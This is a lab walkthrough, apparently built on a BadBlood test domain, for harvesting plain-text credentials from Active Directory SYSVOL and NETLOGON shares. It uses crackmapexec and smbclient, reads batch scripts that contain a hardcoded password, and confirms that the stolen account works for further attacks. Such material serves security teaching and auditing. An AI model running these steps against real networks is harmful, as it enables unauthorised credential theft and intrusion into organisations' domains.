==========================================================================================================================
Credentials harvesting from Domain Shares
==========================================================================================================================

The objective of this 'attack' is to look for clear-text credentials that may be hardcoded in scripts and files stored on Domain shares:
> SYSVOL share
  - %SystemRoot%\SYSVOL\sysvol\<domain_name>\Policies
  - %SystemRoot%\SYSVOL\sysvol\<domain_name>\scripts
> NETLOGON share
> any mapped drives in AD

Often passwords can be found hardcoded in '.bat', '.ps1' and '.vbs' scripts and also in '.ini' and '.xml' configuration files.

=======================================================================================================================================
Example - Step 1. Check if you have access to the shares of the Domain Controller (by design it is the case for all 'Domain users')
=======================================================================================================================================

Windows
--------
Simply try to browse the SYSVOL and NETLOGON shares with the Windows explorer (e.g. '\\security-test-lab.local\SYSVOL\' and '\\security-test-lab.local\NETLOGON\')
or start a PowerShell command prompt and use the 'LS' command (e.g. PS C:\Users\testuser> $ ls \\<domain name>\SYSVOL\).

Kali Linux
----------
jeff@kali:~/Documents/CTFs/BadBlood$ sudo crackmapexec smb 192.168.1.50 -u testuser -p Test1234 --shares
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\testuser:Test1234 
SMB         192.168.1.50    445    TEMP-DC          [+] Enumerated shares
SMB         192.168.1.50    445    TEMP-DC          Share           Permissions     Remark
SMB         192.168.1.50    445    TEMP-DC          -----           -----------     ------
SMB         192.168.1.50    445    TEMP-DC          ADMIN$                          Remote Admin
SMB         192.168.1.50    445    TEMP-DC          C$                              Default share
SMB         192.168.1.50    445    TEMP-DC          IPC$                            Remote IPC
SMB         192.168.1.50    445    TEMP-DC          NETLOGON        READ            Logon server share 
SMB         192.168.1.50    445    TEMP-DC          SYSVOL          READ            Logon server share 


============================================================================================================================================
Example - Step 2. Browse the domain shares and look for credentials stored in plain-text in scripts and files (.vbs, .ps1, .bat, .ini, .xml)
============================================================================================================================================

jeff@kali:~/Documents/CTFs/BadBlood$ smbclient \\\\192.168.1.50\\SYSVOL -U 'security-lab\\testuser'
Enter testuser's password: 
Try "help" to get a list of possible commands.

smb: \> dir
  .                                   D        0  Sat Apr 18 00:35:23 2020
  ..                                  D        0  Sat Apr 18 00:35:23 2020
  dJjaOtNApx                          D        0  Sat Apr 18 00:35:23 2020
  OyEUcVTpkm                          D        0  Wed Apr 15 12:28:52 2020
  Security-Test-Lab.Local             D        0  Wed Apr 15 08:59:43 2020

                8298495 blocks of size 4096. 5871956 blocks available
                
smb: \> cd dJjaOtNApx
smb: \dJjaOtNApx\> dir
  .                                   D        0  Sat Apr 18 00:35:23 2020
  ..                                  D        0  Sat Apr 18 00:35:23 2020

                8298495 blocks of size 4096. 5871956 blocks available
                
smb: \dJjaOtNApx\> cd ..
smb: \> cd Security-Test-Lab.Local
smb: \Security-Test-Lab.Local\> dir
  .                                   D        0  Wed Apr 15 09:01:07 2020
  ..                                  D        0  Wed Apr 15 09:01:07 2020
  DfsrPrivate                       DHS        0  Wed Apr 15 09:01:07 2020
  Policies                            D        0  Wed Apr 15 08:59:52 2020
  scripts                             D        0  Sat Apr 18 00:50:03 2020

                8298495 blocks of size 4096. 5871956 blocks available
                
smb: \Security-Test-Lab.Local\> cd scripts
smb: \Security-Test-Lab.Local\scripts\> dir
  .                                   D        0  Sat Apr 18 00:50:03 2020
  ..                                  D        0  Sat Apr 18 00:50:03 2020
  CreateUser.bat                      A      214  Sat Apr 18 01:43:54 2020
  Mount-Backupshare.bat               A      100  Sat Apr 18 00:45:06 2020

                8298495 blocks of size 4096. 5871956 blocks available


smb: \Security-Test-Lab.Local\scripts\> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              
smb: \Security-Test-Lab.Local\scripts\> more CreateUser.bat
getting file \Security-Test-Lab.Local\scripts\CreateUser.bat of size 214 as /tmp/smbmore.zLHstn (104.5 KiloBytes/sec) (average 104.5 KiloBytes/sec)

	@echo off
	NET USER Batch-user password01! /ADD /DOMAIN
	NET GROUP "Domain Users" Batch-user /ADD
	NET LOCALGROUP "Replicator" Batch-user /ADD /DOMAIN
	NET LOCALGROUP "WinRMRemoteWMIUsers__" Batch-user /ADD /DOMAIN
	/tmp/smbmore.2N3JJ2 (END)


smb: \Security-Test-Lab.Local\scripts\> 

smb: \Security-Test-Lab.Local\scripts\> more Mount-Backupshare.bat
getting file \Security-Test-Lab.Local\scripts\Mount-Backupshare.bat of size 100 as /tmp/smbmore.wiq38b (48.8 KiloBytes/sec) (average 76.7 KiloBytes/sec)

	@echo off

	net use Z: \\PRBCKsrv01\DC01\ password01! /user:SECURITY-LAB\Batch-user /persistent:yes
	/tmp/smbmore.wiq38b (END)

=====================================================================================================================================
Example - Step 3. Verify that the found credentials are still enabled and valid and use them for further attacks...
=====================================================================================================================================

jeff@kali:~/Documents/CTFs/BadBlood$ crackmapexec smb 192.168.1.50 -u batch-user -p password01! --shares
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\batch-user:password01! 
SMB         192.168.1.50    445    TEMP-DC          [+] Enumerated shares
SMB         192.168.1.50    445    TEMP-DC          Share           Permissions     Remark
SMB         192.168.1.50    445    TEMP-DC          -----           -----------     ------
SMB         192.168.1.50    445    TEMP-DC          ADMIN$                          Remote Admin
SMB         192.168.1.50    445    TEMP-DC          C$                              Default share
SMB         192.168.1.50    445    TEMP-DC          IPC$                            Remote IPC
SMB         192.168.1.50    445    TEMP-DC          NETLOGON        READ            Logon server share 
SMB         192.168.1.50    445    TEMP-DC          SYSVOL          READ            Logon server share 
